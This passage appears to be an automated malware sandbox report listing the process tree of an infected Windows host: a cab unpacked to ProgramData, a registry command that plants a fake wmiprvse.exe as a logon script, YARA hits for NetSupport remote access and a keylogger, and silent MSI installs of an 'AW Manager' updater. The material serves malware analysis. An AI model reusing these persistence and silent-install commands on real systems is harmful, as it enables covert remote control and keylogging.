                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                        Start time:14:33:15
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* C:\ProgramData
                                                                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                                                                        File size:53'248 bytes
                                                                                                                                                                                                                                                                        MD5 hash:544B0DBFF3F393BCE8BB9D815F532D51
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                        Start time:14:33:16
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f
                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                        Start time:14:33:16
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                        Start time:14:33:16
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f
                                                                                                                                                                                                                                                                        Imagebase:0x850000
                                                                                                                                                                                                                                                                        File size:59'392 bytes
                                                                                                                                                                                                                                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                        Start time:14:33:16
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:120'232 bytes
                                                                                                                                                                                                                                                                        MD5 hash:261D6E9D4571D1938CB54A2AE1B1821D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.4543369015.0000000000402000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.4545412473.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.4554414336.00000000111E2000.00000004.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000000.2226521290.0000000000402000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                        Start time:14:33:16
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x03^&pb=1^&px=2598
                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                        Start time:14:33:16
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                                                        Start time:14:33:17
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598
                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                        Start time:14:33:18
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1944,i,7293326498590966015,15724221701917447522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                        Start time:14:33:23
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe" /qn CAMPAIGN="2598
                                                                                                                                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                                                                                                                                        File size:4'724'720 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FA24733F5A6A6F44D0E65D7D98B84AA6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 83%, ReversingLabs
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                        Start time:14:33:26
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                        Imagebase:0x7ff69be70000
                                                                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                        Start time:14:33:29
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 7B2098DE867FDA1FBAC9E94E8D311FE9 C
                                                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                        Start time:14:33:33
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Johan.msi" /qn CAMPAIGN=2598 AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 /qn CAMPAIGN=""2598"" " CAMPAIGN="2598
                                                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                        Start time:14:33:35
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CB3F137362C364F2A010C44D44B9B692
                                                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                        Start time:14:33:35
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                        Imagebase:0x2e0000
                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                        Start time:14:33:35
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                        Start time:14:33:39
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A0F7B99CF6F59695615DF13CC6461763 E Global\MSI0000
                                                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                        Start time:14:33:40
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe" /silentall -nofreqcheck -nogui
                                                                                                                                                                                                                                                                        Imagebase:0x60000
                                                                                                                                                                                                                                                                        File size:1'026'936 bytes
                                                                                                                                                                                                                                                                        MD5 hash:F95007206C6B2407FB69748EF7C93612
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                        Start time:14:33:43
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe" /install silentall "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.ini
                                                                                                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                                                                                                        File size:1'026'936 bytes
                                                                                                                                                                                                                                                                        MD5 hash:F95007206C6B2407FB69748EF7C93612
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                        Start time:14:33:49
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x430000
                                                                                                                                                                                                                                                                        File size:3'635'424 bytes
                                                                                                                                                                                                                                                                        MD5 hash:8CAD036C5CFED94D5319A060C488E38F
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                        Start time:14:33:51
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 9A415338A0E06E3AA66F7530B5FE606F C
                                                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                        Start time:14:33:54
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe" /i "C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\System Updater.msi" AI_SETUPEXEPATH="C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe" SETUPEXEDIR="C:\ProgramData\AW Manager\Windows Manager\updates\v113\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 "
                                                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                        Start time:14:33:54
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 50B63A94597415634C568616DD551356 E Global\MSI0000
                                                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                        Start time:14:33:54
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                        Imagebase:0x2e0000
                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                                                        Start time:14:33:54
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                        Start time:14:33:55
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                        Imagebase:0x2e0000
                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                        Start time:14:33:55
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                        Start time:14:34:00
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                        Imagebase:0x2e0000
                                                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                                                        Start time:14:34:00
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                        Start time:14:34:01
                                                                                                                                                                                                                                                                        Start date:06/12/2023
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
